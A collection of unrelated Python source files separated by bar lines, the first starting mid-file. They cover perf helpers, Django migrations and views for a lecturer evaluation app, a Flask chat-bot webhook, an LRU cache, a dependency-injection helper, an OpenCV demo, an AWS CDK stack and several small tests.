return float(self.hist.weight) / self.parent.hist.weight
def __getitem__(self, key):
return self.__hists[key]
def items_sorted(self, reverse=False):
"""Return a list of (key, hist_tree) children sorted by the
cumulative weight of hist_tree."""
return sorted(self.__hists.items(),
key=lambda (k,ht): ht.hist.weight,
reverse=reverse)
# See Intel SDM Volume 3, table 18-13, and
# https://lkml.org/lkml/2013/1/24/302
LL_SOURCE_STR = [
"unknown L3 miss",
"L1 hit",
"fill buffer hit",
"L2 hit",
"L3 hit, no snoop",
"L3 hit, snoop clean",
"L3 hit, snoop dirty",
"reserved 0x7",
"L3 miss, snoop hit",
"reserved 0x9",
"L3 miss, local DRAM, shared",
"L3 miss, remote DRAM, shared",
"L3 miss, local DRAM, exclusive",
"L3 miss, remote DRAM, exclusive",
"I/O memory",
"un-cacheable memory"]
def ll_source_str(source):
if source < 0 or source >= len(LL_SOURCE_STR):
return "unknown source %#x" % source
return LL_SOURCE_STR[source]
def self_less():
import os, signal
if not os.isatty(1):
return
r, w = os.pipe()
if os.fork() > 0:
os.dup2(r, 0)
os.close(w)
# Make sure less doesn't exit when we do
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
try:
os.execlp("less", "less", "-SFR")
except:
os.execlp("cat")
os.close(r)
os.dup2(w, 1)
os.close(w)
# Python ignores SIGPIPE by default, but we want to exit
# immediately when less exits, like a good UNIX process
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
|
from __future__ import absolute_import
from django.utils.translation import ugettext_lazy as _
GUIDES = {
'issue': {
'id': 1,
'page': 'issue',
'cue': _('Click here for a tour of the issue page'),
'required_targets': ['exception'],
'steps': [
{
'title': _('1. Stacktrace'),
'message': _(
'See which line in your code caused the error and the entire call '
'stack at that point.'),
'target': 'exception',
},
{
'title': _('2. Breadcrumbs'),
'message': _(
'See the events that happened leading up to the error, which often provides '
'insight into what caused the error. This includes things like HTTP requests, '
'database calls, and any other custom data you record. Breadcrumbs integrate '
'seamlessly with many popular web frameworks and record .'),
'target': 'breadcrumbs',
},
{
'title': _('3. Additional Data'),
'message': _(
'Send custom data with every error, and attach tags to them that you can '
'later search and filter by.'),
'target': 'extra',
},
],
},
}
|
# -*- coding: utf-8 -*-
"""
A mock database driver module.
"""
class MockConnection(object):
"""
A mock Connection object.
:param \**kwargs: Accepts anything.
"""
def __init__(self, **kwargs):
self.kwargs = kwargs
# Used to determine if the connection is "open" or not.
self.open = True
def close(self):
"""
"Closes" the connection.
"""
self.open = False
def commit(self):
"""
"Commits" the transaction.
"""
return MockCommit()
def cursor(self, cursorclass=None, **kwargs):
"""
Returns a mock Cursor object.
:param \**kwargs: Accepts anything.
"""
if cursorclass is None:
cursorclass = MockCursor
return cursorclass(self)
class MockCursor(object):
"""
A mock Cursor object.
:param MockConnection connection: A MockConnection object.
"""
def __init__(self, connection):
self.connection = connection
def close(self):
"""
"Closes" the cursor.
"""
self.connection = None
def execute(self, query, *args):
"""
"Executes" a query.
"""
pass
class MockCommit(object):
"""
A mock Commit object. Strictly used for testing methods involving commits.
"""
def __eq__(self, other):
return type(self) == type(other)
def connect(**kwargs):
"""
Returns a mock Connection object.
:param \**kwargs: Accepts anything, which is passed to the Connection
object.
"""
return MockConnection(**kwargs)
|
# Generated by Django 3.2.2 on 2021-05-09 13:29
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Parliament1",
fields=[
("id", models.AutoField(primary_key=True, serialize=False)),
("name", models.CharField(max_length=60)),
("date_born", models.DateField(blank=True, null=True)),
("place_born", models.CharField(blank=True, max_length=50, null=True)),
("profession", models.CharField(blank=True, max_length=80, null=True)),
("lang", models.CharField(blank=True, max_length=70, null=True)),
("party", models.CharField(blank=True, max_length=80, null=True)),
("email", models.CharField(blank=True, max_length=80, null=True)),
("url", models.TextField(blank=True, max_length=15, null=True)),
("pp", models.TextField(blank=True, max_length=10, null=True)),
("dob", models.TextField(blank=True, max_length=15, null=True)),
],
options={
"db_table": "Parliament1",
},
),
]
|
from flask import Flask, request
from pprint import pprint
app = Flask(__name__)
bot = None
@app.route("/", methods=[ 'GET', 'POST' ])
def index():
json_data = request.get_json()
message_id = json_data[ "data" ][ "id" ]
message_info = bot.get_message_details( message_id=message_id ).json()
if message_info[ "personId" ] == bot.get_own_details().json()[ 'id' ]:
return "cannot respond to my own messages"
if 'files' in message_info:
if 'text' in message_info:
if message_info['text'] in bot.hears_file_to_function:
message_text = message_info['text']
files = message_info['files']
bot.hears_file_to_function[message_text](files=message_info['files'], room_id=message_info['roomId'])
return "Works"
elif '*' in bot.hears_file_to_function:
bot.hears_file_to_function['*'](files=message_info['files'], room_id=message_info['roomId'])
return "Defatult file action"
else:
print("Default response for file sent with text not set")
elif bot.default_attachment is not None:
bot.default_attachment(files=message_info['files'], room_id=message_info['roomId'])
return "Works"
else:
print("No action set for receiving the file with text '{}'".format( message_info['text'] ))
elif message_info[ "text" ].strip() != "" and message_info[ "text" ] in bot.hears_to_function:
message_text = message_info[ "text" ]
bot.hears_to_function[ message_text ]( room_id=message_info["roomId"] )
elif message_info["text"].strip() != "" and message_info[ "text" ] not in bot.hears_to_function:
bot.hears_to_function[ "*" ]( room_id=message_info["roomId"] )
return "successfully responded"
@app.route("/attachment-response", methods=["GET", "POST"])
def attachment_response():
json_data = request.get_json()
message_id = json_data['data']['messageId']
message_dict = bot.get_attachment_response(json_data['data']['id'])
if message_id in bot.attachment_response_to_function:
response = bot.attachment_response_to_function[message_id](message_dict)
else:
room_id = message_dict['roomId']
bot.send_message(room_id=room_id, text='The form could not be submitted. You may need to request for the form again then submit. Sorry for the inconvenience :)')
return "attachment response received"
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-28 03:29
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('comic', '0003_auto_20170128_0217'),
]
operations = [
migrations.AlterField(
model_name='comic',
name='comic_account',
field=models.CharField(choices=[('benco', 'Benco'), ('bencomic', 'Bencomic'), ('lemmy', 'Lemmy'), ('mr-shapiro', 'Mr. Shapiro'), ('nomad', "Nomad's ZZT Comics"), ('kaddar', 'Yellow Boarders'), ('frost', 'Frost'), ('revvy', 'The Prophesies of Revvy'), ('zamros', 'Zamros: The Comic'), ('ubgs', "Ol' Uncle Bo's Gamblin' Shack")], max_length=10),
),
migrations.AlterField(
model_name='comic',
name='transcript',
field=models.TextField(blank=True, default=None, null=True),
),
]
|
11110000
00001111
11110000
00001111
11110000
11111111
11000011
00111100
|
class LRUCache:
def __init__(self, max_size=128):
self._max_size = max_size
self._cache_by_key = {}
self._cache_by_use = _LRUCacheList()
def query(self, key):
if key not in self._cache_by_key:
return None
node = self._cache_by_key[key]
self._cache_by_use.move_to_front(node)
return node.value
def add(self, key, value):
if self._cache_by_use.size >= self._max_size:
removed = self._cache_by_use.remove_back()
del self._cache_by_key[removed.key]
node = self._cache_by_use.add_to_front(key, value)
self._cache_by_key[key] = node
class _LRUCacheList:
def __init__(self):
# Front of the list: most recently used
self.front = None
self.back = None
self.size = 0
def add_to_front(self, key, value):
node = _LRUCacheNode(key, value)
self._add_to_front(node)
self.size += 1
return node
def _add_to_front(self, node):
if self.size == 0:
self.front = node
self.back = node
else:
node.next = self.front
self.front.prev = node
self.front = node
def move_to_front(self, node):
if self.front == node:
# Nothing needs to be done if the node is already at the front of
# the list
return
if node.next is None:
# Back of the list
node.prev.next = None
self.back = node.prev
node.prev = None
else:
# Middle of the list
node.prev.next = node.next
node.next.prev = node.prev
node.next = None
node.prev = None
self._add_to_front(node)
def remove_back(self):
if self.size == 0:
return None
node = self.back
if self.size == 1:
self.front = None
self.back = None
else:
node.prev.next = None
self.back = node.prev
self.size -= 1
return node
class _LRUCacheNode:
def __init__(self, key, value):
self.key = key
self.value = value
self.prev = None
self.next = None
|
import pytest
import simple_skidl_parts.analog.vdiv as vdiv
from skidl import *
def test_vdiv1():
gnd, vin, vout = Net("GND"), Net("Vin"), Net("OUT")
v = vdiv.vdiv(vin, vout, gnd, ratio=3.0)
generate_netlist(file_=open("/tmp/lala.net", "w"))
|
# Copyright 2022 neomadas-dev
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from inspect import isclass, isfunction
from typing import get_type_hints
def AutoWire(cls):
def new_decoration(new_method, type_hints):
def wrapper(cls, *args, **kwargs):
self = new_method(cls)
for name, key in type_hints.items():
call = manager.pairs[key]
setattr(self, name, call())
self.__init__(*args, **kwargs)
return self
return wrapper
type_hints = get_type_hints(cls)
cls.__new__ = new_decoration(cls.__new__, type_hints)
return cls
class Manager:
def __init__(self):
self.pairs = {}
def wire(self, interface, concrete):
self.pairs[interface] = concrete
manager = Manager()
# new api
def wire(f):
def wrap(f, type_hints):
def wrapper(*args, **kwargs):
for name, key in type_hints.items():
if isinstance(key, Provide):
kwargs[name] = manager.pairs[key.it]()
return f(*args, **kwargs)
return wrapper
type_hints = get_type_hints(f)
return wrap(f, type_hints)
def Wireable(tg):
def new_decoration(new_method, type_hints):
def wrapper(tg, *args, **kwargs):
self = new_method(tg)
for name, key in type_hints.items():
if isinstance(key, Provide):
call = manager.pairs[key.it]
setattr(self, name, call())
self.__init__(*args, **kwargs)
return self
return wrapper
type_hints = get_type_hints(tg)
tg.__new__ = new_decoration(tg.__new__, type_hints)
return tg
class Provide:
__slots__ = 'it',
def __init__(self, it):
self.it = it
class Provider:
__slots__ = ('_name', '_doc', '__weakref__')
def __init__(self, name, doc):
self._name = name
self._doc = doc
def __new__(cls, *args, **_):
if (len(args) == 3 and
isinstance(args[0], str) and
isinstance(args[1], tuple)):
raise TypeError(f"Cannot subclass {cls!r}")
return super().__new__(cls)
def __init_subclass__(self, /, *_, **ks):
if '_root' not in ks:
raise TypeError('Cannot subclass provider classes')
def __copy__(self): return self
def __deepcopy__(self, _): return self
def __eq__(self, other):
if not isinstance(other, _SpecialForm):
return NotImplemented
return self._name == other._name
def __hash__(self):
return hash((self._name,))
def __repr__(self):
return 'ioc.' + self._name
def __reduce__(self):
return self._name
def __call__(self, *_, **__):
raise TypeError(f'Cannot instantiate {self!r}')
def __instancecheck__(self, _):
raise TypeError(f'{self} cannot be used with isinstance()')
def __subclasscheck__(self, _):
raise TypeError(f'{self} cannot be used with issubclass()')
def __getitem__(self, provider):
return Provide(provider)
Wired = Provider('Wired', doc=
"""Declare a dependency wireable class.
@Wireable
class Service:
member: Wired[Member]
@wire
def process(argument, another: Wired[Another]):
return None
@wire
def process(argument, extra: Wired[Extra]):
return None
""")
|
import argparse
# Apply the edits of a single annotator to generate the corrected sentences.
def main(args):
m2 = open(args.m2_file).read().strip().split("\n\n")
out = open(args.out, "w")
# Do not apply edits with these error types
skip = {"noop", "UNK", "Um"}
for sent in m2:
sent = sent.split("\n")
orig_sent = sent[0].split()[1:] # Ignore "S "
out.write(" ".join(orig_sent)+"\n")
if __name__ == "__main__":
# Define and parse program input
parser = argparse.ArgumentParser()
parser.add_argument("m2_file", help="The path to an input m2 file.")
parser.add_argument("-out", help="A path to where we save the output corrected text file.", required=True)
parser.add_argument("-id", help="The id of the target annotator in the m2 file.", type=int, default=0)
args = parser.parse_args()
main(args)
|
"""
Short demo of drone functionality. For the full list of available commands
check:
https://djitellopy.readthedocs.io/en/latest/tello/
"""
from tello import Drone
with Drone() as d:
d.start_video('video.avi')
d.takeoff()
d.move_forward(50)
d.rotate_clockwise(360)
d.wait(5.0)
d.land()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-10 21:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='disk',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256, verbose_name='\u4e3b\u673a')),
('mark', models.CharField(max_length=80, verbose_name='\u7a7a\u95f4')),
('create_date', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name': '\u78c1\u76d8\u7a7a\u95f4',
'verbose_name_plural': '\u78c1\u76d8\u7a7a\u95f4',
},
),
migrations.CreateModel(
name='Early_warn',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('ipaddress', models.GenericIPAddressField(blank=True, null=True, verbose_name='IP\u5730\u5740')),
('mark', models.CharField(max_length=30, verbose_name='\u6545\u969c\u6807\u8bc6')),
('report_msm', models.TextField(verbose_name='\u6c47\u62a5\u4fe1\u606f')),
('report_date', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name': '\u5f02\u5e38\u6293\u53d6\u63a8\u9001',
'verbose_name_plural': '\u5f02\u5e38\u6293\u53d6\u63a8\u9001',
},
),
migrations.CreateModel(
name='softver',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256, verbose_name='\u4e3b\u673a')),
('Kernel', models.CharField(max_length=80, verbose_name='\u5185\u6838')),
('nginx', models.CharField(max_length=80, verbose_name='nginx')),
('create_date', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name': '\u8f6f\u4ef6\u7248\u672c',
'verbose_name_plural': '\u8f6f\u4ef6\u7248\u672c',
},
),
migrations.CreateModel(
name='tomcatver',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256, verbose_name='\u4e3b\u673a')),
('tomcat', models.CharField(max_length=80, verbose_name='\u7248\u672c')),
('create_date', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name': 'tomcat\u7248\u672c',
'verbose_name_plural': 'tomcat\u7248\u672c',
},
),
]
|
import os
from aws_cdk import (
core,
aws_lambda,
aws_lambda_event_sources as sources,
aws_iam as iam,
aws_s3 as s3,
aws_sns as sns,
aws_dynamodb as dynamo,
aws_events as events,
aws_events_targets as event_targets,
)
class JobSummaryStack(core.Stack):
def __init__(self,
scope: core.Construct,
id: str,
orchestration_sfn_name: str,
launch_sfn_name: str,
log_bucket_arn: str,
destination_bucket_name: str,
success_sns_topic_arn: str,
failure_sns_topic_arn: str,
**kwargs
):
super().__init__(scope, id, **kwargs)
aws_account = os.environ["CDK_DEFAULT_ACCOUNT"]
aws_region = os.environ["CDK_DEFAULT_REGION"]
lambda_code = aws_lambda.Code.from_asset("infrastructure/job_summary/lambda_source/")
job_summary_lambda = aws_lambda.Function(self, "EmrLaunchJobSummaryLambda",
code=lambda_code,
handler="main.lambda_handler",
runtime=aws_lambda.Runtime.PYTHON_3_7,
timeout=core.Duration.minutes(1),
environment={
"DESTINATION_BUCKET_NAME": destination_bucket_name,
"SUCCESS_SNS_TOPIC_ARN": success_sns_topic_arn,
"FAILURE_SNS_TOPIC_ARN": failure_sns_topic_arn
},
initial_policy=[
iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=[
"states:DescribeExecution",
"states:GetExecutionHistory",
],
resources=[
f"arn:aws:states:{aws_region}:{aws_account}:execution:{orchestration_sfn_name}:*",
f"arn:aws:states:{aws_region}:{aws_account}:execution:{launch_sfn_name}:*",
]
),
iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=[
"elasticmapreduce:DescribeCluster",
"elasticmapreduce:ListSteps",
],
resources=[
f"arn:aws:elasticmapreduce:{aws_region}:{aws_account}:cluster/*",
]
),
iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=[
"s3:ListBucket",
"s3:GetObject",
"s3:PutObject",
],
resources=[
log_bucket_arn,
f"{log_bucket_arn}/*",
]
),
iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=[
"SNS:Publish",
],
resources=[
success_sns_topic_arn,
failure_sns_topic_arn,
]
)
],
)
job_summary_event_rule = events.Rule(self, "EmrLaunchJobSummaryEventRule",
description="Triggers the creation of SFN execution summary",
event_pattern=events.EventPattern(
source=["aws.states"],
detail_type=["Step Functions Execution Status Change"],
detail={
"status": [
"SUCCEEDED",
"FAILED",
"TIMED_OUT",
"ABORTED"
],
"stateMachineArn": [
f"arn:aws:states:{aws_region}:{aws_account}:stateMachine:{orchestration_sfn_name}",
]
}
)
)
job_summary_event_rule.add_target(event_targets.LambdaFunction(job_summary_lambda,
event=events.RuleTargetInput.from_object({
"sfnExecutionArn": events.EventField.from_path("$.detail.executionArn")
})
))
|
# USAGE
# python simple_thresholding.py --image ../images/coins.png
# Import the necessary packages
import numpy as np
import argparse
import cv2
# Construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required = True,
help = "Path to the image")
args = vars(ap.parse_args())
# Load the image, convert it to grayscale, and blur it slightly
image = cv2.imread(args["image"])
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(image, (5, 5), 0)
cv2.imshow("Image", image)
# Let's apply basic thresholding. The first parameter is the
# image we want to threshold, the second value is is our threshold
# cehck. If a pixel value is greater than our threshold (in this
# case, 155), we it to be WHITE, otherwise it is BLACK.
(T, threshInv) = cv2.threshold(blurred, 155, 255, cv2.THRESH_BINARY_INV)
cv2.imshow("Threshold Binary Inverse", threshInv)
# Using a normal we can change the last argument in the function
# to make the coins black rather than white.
(T, thresh) = cv2.threshold(blurred, 155, 255, cv2.THRESH_BINARY)
cv2.imshow("Threshold Binary", thresh)
# Finally, let's use our threshold as a mask and visualize only
# the coins in the image
cv2.imshow("Coins", cv2.bitwise_and(image, image, mask = threshInv))
cv2.waitKey(0) |
from gencon_miner import GenconMiner, __version__
def test_version():
assert __version__ == '0.1.6'
def test_url_extract():
miner = GenconMiner(url='http://google.com')
data = miner.extract('title')
assert data[-1].text == 'Google'
def test_text_extract():
import requests
html_data = requests.get('http://google.com')
miner = GenconMiner(text=html_data.text)
data = miner.extract('title')
assert data[-1].text == 'Google'
def test_on_target_extract():
miner = GenconMiner(url='http://google.com')
data = miner.extract('html', 'title')
assert data[-1].text == 'Google'
def test_on_get_all_text():
import json
miner = GenconMiner(url='http://jsonplaceholder.typicode.com/todos/1')
data = miner.to_text()
test_json = {"userId": 1,
"id": 1,
"title": "delectus aut autem",
"completed": False}
assert json.loads(data) == test_json
def test_on_get_soup():
from bs4 import BeautifulSoup
miner = GenconMiner(url='http://google.com')
assert isinstance(miner.to_soup(), BeautifulSoup)
|
#pj17
ones = ('one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine')
teens = ('ten', 'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen', 'seventeen', 'eighteen', 'nineteen')
tenties = ('twenty', 'thirty', 'forty', 'fifty', 'sixty', 'seventy', 'eighty', 'ninety')
ten_to_str = {3:'thousand', 6:'million', 9:'billion'}
def int_to_str(num):
"""takes num e.g. 123 and outputs 'one hundred and twenty three'"""
b = strip(num)
c = []
length = len(b)
count = length-1
temp = 0
while count >= 0:
if temp == 3:
temp = 0
if temp == 0:
c.append([])
c[-1].append(b[count])
temp += 1
count -= 1
c.reverse()
for thing in c:
thing.reverse()
numString = ''
for thing in c:
power = thing[-1][-1]
num = int(''.join([str(pair[0]) for pair in thing]))
powerString = ' ' + ten_to_str[power] + ' ' if power != 0 else ''
if power == 0 and num < 100 and num != 0:
numString += 'and '
numString += int_to_num_below_100(num) + powerString
return(numString)
def strip(num):
""" takes num e.g. 456 and outputs [[4, 2], [5, 1], [6, 0]]"""
a = str(num)
b = []
length = len(a)-1
for char in a:
b.append([int(char), length])
length -= 1
return(b)
def int_to_num_below_100(num):
b = strip(num)
comp = ''
count = 0
length = len(b)
#True if there was stuff before - then next thing will add ' '
stuffLatch = False
#True if there is hundreds to deal with - then if stuff in tens or ones will add 'and'
andLatch = False
#True if there is teens to deal with - then ones ignored
teenLatch = False
#True if no hundreds or tens - then zero can be put in
zeroLatch = False
twoLatch = False
if length == 3:
#If the hundred's isn't 0, so it is actually a number ish.
if b[count][0] != 0:
#some number of hundreds
comp += ones[b[count][0]-1] + ' ' + 'hundred'
#There will need to be an and
stuffLatch = True
andLatch = True
count += 1
stuffLatch = True
if length >= 2:
temp = len(comp)
#If there's stuff in 2, and stuff in 3, add ' and'
if b[count][0] != 0:
twoLatch = True
if andLatch:
comp += ' and '
andLatch = False
else:
#So that step 3 (1) knows that stuff's happened
stuffLatch = True
if b[count][0] == 1:
#So that step 3 (1) knows not to do anything
teenLatch = True
comp += teens[b[count+1][0]]
elif b[count][0] != 0:
#If not teen and not 0, add on twenty/thirty/...
comp += tenties[b[count][0]-2]
count += 1
if length >= 1:
if b[count][0] != 0:
#If and needs to be said, say ' and'
if andLatch:
comp += ' and '
if zeroLatch:
#aka if the one digit is zero and there's been nothing before, add zero
comp += 'zero'
if not teenLatch and b[count][0] != 0:
if twoLatch:
comp += '-'
#if wasn't a teen and stuff
comp += ones[b[count][0]-1]
return(comp)
def letter_length(end, start=1):
"""calculates number of letters from start to end inclusive"""
comp = 0
for num in range(start, end+1):
temp = int_to_str(num)
for char in temp:
if char != ' ' and char != '-':
comp += 1
return(comp)
|
# coding: utf-8
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import unicode_literals
from six.moves import xrange as range
from nbdime import patch
from nbdime.diff_format import is_valid_diff
from nbdime.diffing.lcs import diff_from_lcs
from nbdime.diffing.seq_bruteforce import (bruteforce_compare_grid, bruteforce_llcs_grid,
bruteforce_lcs_indices, diff_sequence_bruteforce)
def test_diff_sequence_bruteforce():
examples = [
([], []),
([1], [1]),
([1, 2], [1, 2]),
([2, 1], [1, 2]),
([1, 2, 3], [1, 2]),
([2, 1, 3], [1, 2]),
([1, 2], [1, 2, 3]),
([2, 1], [1, 2, 3]),
([1, 2], [1, 2, 1, 2]),
([1, 2, 1, 2], [1, 2]),
([1, 2, 3, 4, 1, 2], [3, 4, 2, 3]),
(list("abcab"), list("ayb")),
(list("xaxcxabc"), list("abcy")),
]
for a, b in examples:
G = bruteforce_compare_grid(a, b)
assert all(bool(G[i][j]) == (a[i] == b[j]) for i in range(len(a)) for j in range(len(b)))
R = bruteforce_llcs_grid(G)
for i in range(len(a)):
for j in range(len(b)):
assert R[i+1][j+1] >= R[i][j]
assert R[i+1][j] >= R[i][j]
assert R[i][j+1] >= R[i][j]
assert R[i+1][j+1] - R[i][j] <= 1
assert R[i+1][j] - R[i][j] <= 1
assert R[i][j+1] - R[i][j] <= 1
llcs = R[len(a)][len(b)]
A_indices, B_indices = bruteforce_lcs_indices(a, b, G, R)
assert len(A_indices) == len(B_indices)
assert len(A_indices) == llcs
assert all(a[A_indices[r]] == b[B_indices[r]] for r in range(llcs))
d = diff_from_lcs(a, b, A_indices, B_indices)
assert is_valid_diff(d)
assert patch(a, d) == b
# Test combined function (repeats the above pieces)
assert patch(a, diff_sequence_bruteforce(a, b)) == b
|
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib import auth
from django.template.context_processors import csrf
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib import messages
from .models import Lecturer, Unit, SectionOne, SectionTwo, SectionThree, SectionFour, SectionFive, Lecturer_Evaluated, RegisteredUnit
from django.contrib.auth.models import User
# from django.models import Student
# Create your views here.
def home_view(request, *args, **kwargs):
return render(request, "home.html", {})
def evaluate_view(request, *args, **kwargs):
if request.user.is_authenticated:
return render(request, "evaluate.html", context={"registered_units": RegisteredUnit.objects.all().order_by(
'id', 'lecturer', 'lecturer_id', 'student', 'student_id', 'unit', 'unit_id')})
else:
return render(request, "login.html")
def evaluate_section_ii_view(request, *args, **kwargs):
if request.user.is_authenticated:
return render(request, "evaluate-section-ii.html", {})
else:
return render(request, "login.html")
def evaluate_section_iii_view(request, *args, **kwargs):
if request.user.is_authenticated:
return render(request, "evaluate-section-iii.html", {})
else:
return render(request, "login.html")
def evaluate_section_iv_view(request, *args, **kwargs):
return render(request, "evaluate-section-iv.html", {})
def student_login_view(request, *args, **kwargs):
c = {}
c.update(csrf(request))
return render(request, "login.html", c)
def auth_view(request, *args, **kwargs):
if request.method == "POST":
form = AuthenticationForm(request, data=request.POST)
if form.is_valid():
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password')
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
messages.info(request, "Logged in successfully!")
return redirect('../evaluate', {})
else:
messages.error(request, f"Invalid Registration number or Password!")
return redirect('../login')
else:
messages.error(request, f"Invalid Registration number or Password!")
return redirect('../login')
form = AuthenticationForm()
return render(request, "login.html")
def section_one(request, *args, **kwargs):
if request.method == "POST":
unit_id_r = request.POST.get('unit')
unit_id_r = unit_id_r.split('#')
unit_id = int(unit_id_r[0])
lecturer_id = int(unit_id_r[1])
lecturer = str(unit_id_r[2])
# unit_id = 1
# lecturer_id = 1
# lecturer = "KATHRYNE KAREN"
q1 = request.POST.get('section-1-a')
q2 = request.POST.get('section-1-b')
q3 = request.POST.get('section-1-c')
# user = User.objects.get(id=user_id)
# user = User.objects.get(username=request.user.username)
login = request.user.id
user = User.objects.get(id=login)
unit = Unit.objects.get(id=unit_id)
lec = Lecturer.objects.get(id=lecturer_id)
section1a = Lecturer_Evaluated(name=lecturer, unit_id=unit, student_id=user)
section1a.save()
section1 = SectionOne(student=user, lecturer=lec, unit=unit, q1=q1, q2=q2, q3=q3)
section1.save()
return render(request, "evaluate-section-ii.html", context={"lecturer_id": lecturer_id, "unit_id": unit_id})
else:
return redirect('../../evaluate/')
def section_two(request, *args, **kwargs):
if request.method == "POST":
lecturer_id = request.POST.get('lecturer_id')
unit_id = request.POST.get('unit_id')
q1 = request.POST.get('section-2-a')
q2 = request.POST.get('section-2-b')
q3 = request.POST.get('section-2-c')
q4 = request.POST.get('section-2-d')
q5 = request.POST.get('section-2-e')
q6 = request.POST.get('section-2-f')
q7 = request.POST.get('section-2-g')
q8 = request.POST.get('section-2-h')
q9 = request.POST.get('section-2-i')
q10 = request.POST.get('section-2-j')
q11 = request.POST.get('section-2-k')
q12 = request.POST.get('section-2-l')
login = request.user.id
user = User.objects.get(id=login)
unit = Unit.objects.get(id=unit_id)
lec = Lecturer.objects.get(id=lecturer_id)
section2 = SectionTwo(student=user, lecturer=lec, unit=unit, q1=q1, q2=q2, q3=q3, q4=q4, q5=q5, q6=q6, q7=q7, q8=q8, q9=q9, q10=q10, q11=q11, q12=q12)
section2.save()
return render(request, "evaluate-section-iii.html", {})
else:
return redirect('../../evaluate/2')
def section_three(request, *args, **kwargs):
if request.method == "POST":
q1 = request.POST.get('section-3-a')
q2 = request.POST.get('section-3-b')
q3 = request.POST.get('section-3-c')
q4 = request.POST.get('section-3-d')
q5 = request.POST.get('section-3-e')
q6 = request.POST.get('section-3-f')
q7 = request.POST.get('section-3-g')
login = request.user.id
user = User.objects.get(id=login)
section3 = SectionThree(student=user, q1=q1, q2=q2, q3=q3, q4=q4, q5=q5, q6=q6, q7=q7)
section3.save()
return render(request, "evaluate-section-iv.html", {})
else:
return redirect('../../evaluate/3')
def section_four(request, *args, **kwargs):
if request.method == "POST":
item1 = request.POST.get('Lecturer')
item2 = request.POST.get('ICT')
item3 = request.POST.get('Examination-Office')
item4 = request.POST.get('Library')
item5 = request.POST.get('comment')
q1 = request.POST.get('library-comment-a')
q2 = request.POST.get('library-comment-b')
q3 = request.POST.get('ict-comment-a')
q4 = request.POST.get('ict-comment-b')
q5 = request.POST.get('exam-comment-a')
q6 = request.POST.get('exam-comment-b')
q7 = request.POST.get('lecturer-comment-a')
q8 = request.POST.get('lecturer-comment-b')
login = request.user.id
user = User.objects.get(id=login)
section4a = SectionFour(student=user, item=item1, q1=q7, q2=q8)
section4b = SectionFour(student=user, item=item2, q1=q3, q2=q4)
section4c = SectionFour(student=user, item=item3, q1=q5, q2=q6)
section4d = SectionFour(student=user, item=item4, q1=q1, q2=q2)
section4e = SectionFive(student=user, improvement=item5,)
section4a.save()
section4b.save()
section4c.save()
section4d.save()
section4e.save()
return render(request, "home.html", {})
else:
return redirect('../../evaluate/4')
def loggedin(request, *args, **kwargs):
return render(request, "evaluate.html", {'full_name': request.user.regno})
def invalid_login(request, *args, **kwargs):
return render(request, "login.html", {})
def logout_view(request, *args, **kwargs):
logout(request)
messages.info(request, "Logged out successfully!")
return redirect("home")
|
import Customer
class Order:
def __init__(self, productname, productcode):
self.productname = productname
self.productcode = productcode
|
